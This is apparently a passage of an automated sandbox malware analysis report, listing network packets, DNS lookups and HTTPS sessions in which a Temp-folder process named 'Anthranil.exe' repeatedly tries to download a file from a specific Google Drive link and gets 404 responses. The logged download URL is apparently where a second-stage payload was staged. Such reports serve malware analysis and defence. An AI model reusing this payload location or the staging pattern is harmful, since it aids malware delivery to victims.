                                                                                  Jan 11, 2025 05:30:12.400844097 CET44349334216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:13.038872957 CET44349334216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:13.039120913 CET49334443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:13.039658070 CET44349334216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:13.040796041 CET49334443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:13.043344021 CET49334443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:13.043354034 CET44349334216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:13.043591976 CET44349334216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:13.044372082 CET49334443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:13.044372082 CET49334443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:13.087321043 CET44349334216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:13.433527946 CET44349334216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:13.433820009 CET49334443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:13.433845997 CET44349334216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:13.433916092 CET49334443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:13.433962107 CET49334443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:13.433996916 CET44349334216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:13.434140921 CET44349334216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:13.434199095 CET49334443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:13.434215069 CET49334443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:13.453624964 CET49335443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:30:13.453654051 CET44349335142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:30:13.453762054 CET49335443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:30:13.454035997 CET49335443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:30:13.454047918 CET44349335142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:30:14.102565050 CET44349335142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:30:14.105098009 CET49335443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:30:14.109389067 CET49335443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:30:14.109395981 CET44349335142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:30:14.110191107 CET49335443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:30:14.110196114 CET44349335142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:30:14.524573088 CET44349335142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:30:14.524637938 CET44349335142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:30:14.524677038 CET49335443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:30:14.524677038 CET49335443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:30:14.524692059 CET44349335142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:30:14.524702072 CET44349335142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:30:14.524962902 CET49335443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:30:14.525760889 CET49335443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:30:14.525769949 CET44349335142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:30:14.647464037 CET49336443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:14.647521973 CET44349336216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:14.647619009 CET49336443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:14.647953033 CET49336443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:14.647963047 CET44349336216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:15.314094067 CET44349336216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:15.314162016 CET49336443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:15.316044092 CET44349336216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:15.316095114 CET49336443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:15.318131924 CET49336443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:15.318147898 CET44349336216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:15.318418026 CET44349336216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:15.318464041 CET49336443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:15.318811893 CET49336443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:15.359329939 CET44349336216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:15.712903023 CET44349336216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:15.712982893 CET49336443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:15.713011026 CET44349336216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:15.713057995 CET49336443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:15.713152885 CET49336443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:15.713200092 CET44349336216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:30:15.713253021 CET49336443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:30:15.728729963 CET49337443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:30:15.728776932 CET44349337142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:30:15.728960991 CET49337443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:30:15.729134083 CET49337443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:30:15.729149103 CET44349337142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:30:16.388039112 CET44349337142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:30:16.388159990 CET49337443192.168.2.4142.250.185.129

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 11, 2025 05:28:54.855712891 CET5362495162.159.36.2192.168.2.4
                                                                                  Jan 11, 2025 05:28:55.680970907 CET53585711.1.1.1192.168.2.4
                                                                                  Jan 11, 2025 05:29:31.168807030 CET6280753192.168.2.41.1.1.1
                                                                                  Jan 11, 2025 05:29:31.175471067 CET53628071.1.1.1192.168.2.4
                                                                                  Jan 11, 2025 05:29:32.282839060 CET6011753192.168.2.41.1.1.1
                                                                                  Jan 11, 2025 05:29:32.289963007 CET53601171.1.1.1192.168.2.4

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Jan 11, 2025 05:29:31.168807030 CET192.168.2.41.1.1.10xb59Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                  Jan 11, 2025 05:29:32.282839060 CET192.168.2.41.1.1.10x4318Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Jan 11, 2025 05:29:31.175471067 CET1.1.1.1192.168.2.40xb59No error (0)drive.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                  Jan 11, 2025 05:29:32.289963007 CET1.1.1.1192.168.2.40x4318No error (0)drive.usercontent.google.com142.250.185.129A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • drive.google.com
                                                                                  • drive.usercontent.google.com

                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.449202216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:31 UTC216OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  2025-01-11 04:29:32 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:32 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Security-Policy: script-src 'nonce-3mCk-j7kfvW5UloDThB8jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.449209142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:32 UTC258OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  2025-01-11 04:29:33 UTC2223INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgTBooCx_HrtJC3dg5lWi0qpxqYt1SJrNXd72GCuoigbkGjPBUDAxsHkQUQpyZECnBog
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:33 GMT
                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-wFy2sGQAm2wSFVrYWoRwbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Set-Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb; expires=Sun, 13-Jul-2025 04:29:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:29:33 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 6b 54 64 62 52 30 5a 57 62 65 4f 46 5a 30 64 54 63 79 45 6c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="akTdbR0ZWbeOFZ0dTcyElw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.449218216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:34 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:34 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:34 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-Xc3cbWlZ5zyHKAFWmgqeoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.449226142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:35 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:35 UTC1851INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgRzeassAPrPqTtDI0EaN8RC2ufu6O8jkL6XiWWcIWXfkChYAV2RGftzfisi6M0ihpBrV-sZs4U
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:35 GMT
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-aXNXIr4DnQiNWYCr3ejh7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:29:35 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 30 48 34 70 5f 56 52 68 30 69 59 73 4b 56 47 73 75 5f 56 30 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="t0H4p_VRh0iYsKVGsu_V0A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.449235216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:36 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:36 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:36 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-y87uOTxrQrPw06iqEvMTEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.449243142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:37 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:37 UTC1851INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgTZdeheKZn9JVpZuacOi6ApEAGnQOQGB0gK8y9XyaH5NkKrKYsmI5h_vm5TG_rcdgXTSii4tGg
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:37 GMT
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-ngv22eOXnR0dwv_YGuvWuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
